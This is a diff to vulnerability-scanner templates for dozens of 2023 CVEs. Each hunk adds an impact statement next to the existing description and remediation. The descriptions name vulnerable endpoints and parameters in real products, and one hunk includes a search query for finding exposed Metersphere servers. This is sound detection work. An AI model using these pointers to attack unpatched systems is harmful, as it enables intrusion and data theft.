@@ -6,6 +6,8 @@ info: severity: medium description: | Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of Tiempo.com (version 0.1.3 or above) that addresses the XSS vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 573538e395..8ef12fa502 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information stored in the device's memory. remediation: | Apply the latest security patches and updates provided by Securepoint to fix the memory leakage issue. reference: diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 169dac7424..30c461a496 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index 01aac8f17f..469eba2735 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system. remediation: | Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. reference: diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index 4824530442..58f11f6e18 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to WordPress Paid Memberships Pro version 2.9.8 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index f6af90eb2b..7175b69e56 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Easy Digital Downloads plugin 3.1.0.2 and 3.1.0.3 contains a SQL injection vulnerability in the s parameter of its edd_download_search action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to the latest version of Easy Digital Downloads plugin (3.1.0.4 or higher) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index 99f0ce41f5..57a42d8410 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Login with Phone Number, versions < 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the theft of sensitive user information or unauthorized actions. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 272a4d6022..575840e81d 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1. + impact: | + Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade Mlflow to version 2.3.0 or above to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index fa678439d2..110df3a6c5 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. + impact: | + The vulnerability can lead to unauthorized access to user passwords, compromising the confidentiality of user accounts. remediation: Upgrade to Joomla! version 4.2.8 or later. reference: - https://unsafe.sh/go-149780.html diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 5f45303bd9..a5d08aa427 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Plesk Obsidian through 18.0.49 contains an open redirect vulnerability via the login page. An attacker can redirect users to malicious websites via a host request header and thereby access user credentials and execute unauthorized operations. NOTE: The vendor's position is "the ability to use arbitrary domain names to access the panel is an intended feature." + impact: | + Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade Plesk Obsidian to a version higher than 18.0.49 to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index c8aef5e22e..5a8ca9f8ab 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF). + impact: | + Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the server, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest security patches or updates provided by CData to fix the SSRF vulnerability in RSB Connect v22.0.8336. reference: diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index b8f277d126..eed835e0b0 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Squidex CMS version 7.4.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-24367.yaml b/http/cves/2023/CVE-2023-24367.yaml index c01677389d..a7062dbd04 100644 --- a/http/cves/2023/CVE-2023-24367.yaml +++ b/http/cves/2023/CVE-2023-24367.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. Additionally, implement input validation and output encoding to prevent XSS attacks. reference: diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 976a91489e..0da4eea033 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index 0785a171a4..386a3de364 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 1ca9349ca2..035f1f030f 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of phpIPAM or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 4d649f5cc6..bfa65e6022 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of PMB. reference: diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 85caf35c6d..39f51d90d8 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade PMB to a version that has addressed the open redirect vulnerability (CVE-2023-24735). reference: diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 56df907e6f..e130ce9ec6 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of PMB. reference: diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 24ee7f3b52..4c0dfb6dd5 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index 1b8c23df0c..7d0a975333 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the GeoServer project to fix the SQL Injection vulnerability. reference: 
diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index f4e0d7c210..70f93434cc 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 28804f27ea..b7b8b40313 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1 + impact: | + This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, credentials, and other sensitive data. remediation: Users are advised to upgrade. There are no known workarounds for this vulnerability. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Metersphere%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2023-25573.md 
@@ -20,13 +22,12 @@ info: epss-percentile: 0.34763 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - fofa-query: body="Metersphere" + max-request: 1 vendor: metersphere product: metersphere + fofa-query: body="Metersphere" tags: cve,cve2023,metersphere,lfi - variables: str: "{{rand_base(4)}}" rand: "{{rand_base(3)}}" diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index 500447f9b4..cb58c98113 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request. + impact: | + Remote code execution vulnerability in Ruckus Wireless Admin allows attackers to execute arbitrary code on the target system. remediation: | Apply the latest security patches and updates provided by Ruckus Wireless to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index 03cced30db..9e3703f1a1 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4). + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device. remediation: | Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index d961c4c9b5..650fac0577 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | STAGIL Navigation for Jira Menu & Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade STAGIL Navigation for Jira Menu & Themes to version 2.0.52 or higher to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 2c5f8c2e5b..29634a6ea1 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -6,6 +6,8 @@ info: severity: high description: | STAGIL Navigation for Jira Menu & Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade STAGIL Navigation for Jira Menu & Themes to version 2.0.52 or higher to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index f02043e8a0..4828812b45 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier + impact: | + This vulnerability can lead to unauthorized access to sensitive information stored on the server. remediation: | Apply the necessary security patches or updates provided by Adobe to fix the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index 2af82f3e94..5279ef0586 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade Jorani to a patched version or apply the necessary security patches. reference: diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index cab7d32bce..e35239c3f1 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of Weaver E-Office. reference: diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 7681ba2887..d115a864f6 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 4e952f066f..657a216aaa 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 9669c72914..0e2a9a13fa 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ATutor < 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade ATutor to version 2.2.2 or above to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 4659e7c454..d0a8e724d5 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and its underlying infrastructure. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index 459b527659..3755c67b76 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + This vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further exploitation of the server. remediation: | Upgrade Appwrite to a version higher than 1.2.1 to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index 99bfb5fca5..3259e2691e 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php. + impact: | + An attacker can exploit this vulnerability to download arbitrary files from the server. remediation: | Apply the latest patch or upgrade to a newer version of GDidees CMS. reference: diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 3610e1c372..13d2a955f7 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest patch or update to the latest version of OpenCATS to fix the open redirect vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index 70c045fea9..8a8424a2a2 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. + impact: | + An attacker can bypass authentication and gain unauthorized access to the MStore API, potentially leading to data breaches or unauthorized actions. remediation: | Upgrade to a patched version of MStore API (version 3.9.3 or above) to mitigate the authentication bypass vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index f3730e1078..2abd471d56 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index bc0497236d..ca69bbb453 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Apply the latest security patches or upgrade to a patched version of SPIP. reference: diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index dd868fb49e..01a57fd5d7 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Home Assistant Supervisor, potentially leading to further compromise of the system. remediation: | The issue has been mitigated and closed in Supervisor version 2023.03.1, which has been rolled out to all affected installations via the auto-update feature of the Supervisor. This rollout has been completed at the time of publication of this advisory. Home Assistant Core 2023.3.0 included mitigation for this vulnerability. Upgrading to at least that version is thus advised. In case one is not able to upgrade the Home Assistant Supervisor or the Home Assistant Core application at this time, it is advised to not expose your Home Assistant instance to the internet. reference: 
diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 62522af1e7..850dece5d6 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK,_0xf4n9x_ severity: critical description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information. remediation: | Apply the latest security patches or upgrade to a patched version of Apache Superset. reference: diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 05146bb2d6..6c29fa3362 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key. + impact: | + This vulnerability can lead to the exposure of sensitive information, such as usernames, passwords, or internal system details. remediation: This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds. reference: - 